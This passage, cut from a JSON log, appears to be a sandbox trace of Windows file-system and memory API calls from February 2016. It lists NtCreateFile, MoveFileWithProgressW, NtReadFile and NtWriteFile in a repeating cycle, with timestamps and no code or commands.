"2016-02-16 17:41:46,138", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,138", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,138", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,169", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,169", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,189", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,189", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,199", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,199", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,209", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,239", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,239", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,249", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:46,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,259", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,269", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:46,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,299", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,299", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,319", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,319", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,329", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,329", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,329", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:46,329", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,329", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,329", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,339", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,339", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,349", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,349", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,359", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,359", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,369", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,369", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,369", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,389", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,399", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,399", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,399", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,409", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,409", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,419", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,429", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,429", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,439", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:46,439", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,439", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,459", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,459", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,459", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,459", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,469", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,469", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,479", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:46,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,479", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,479", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,489", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,489", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,499", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,519", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,529", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,529", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:46,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,549", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,549", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:46,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:46,569", "api": "NtWriteFile"}, {"category": 
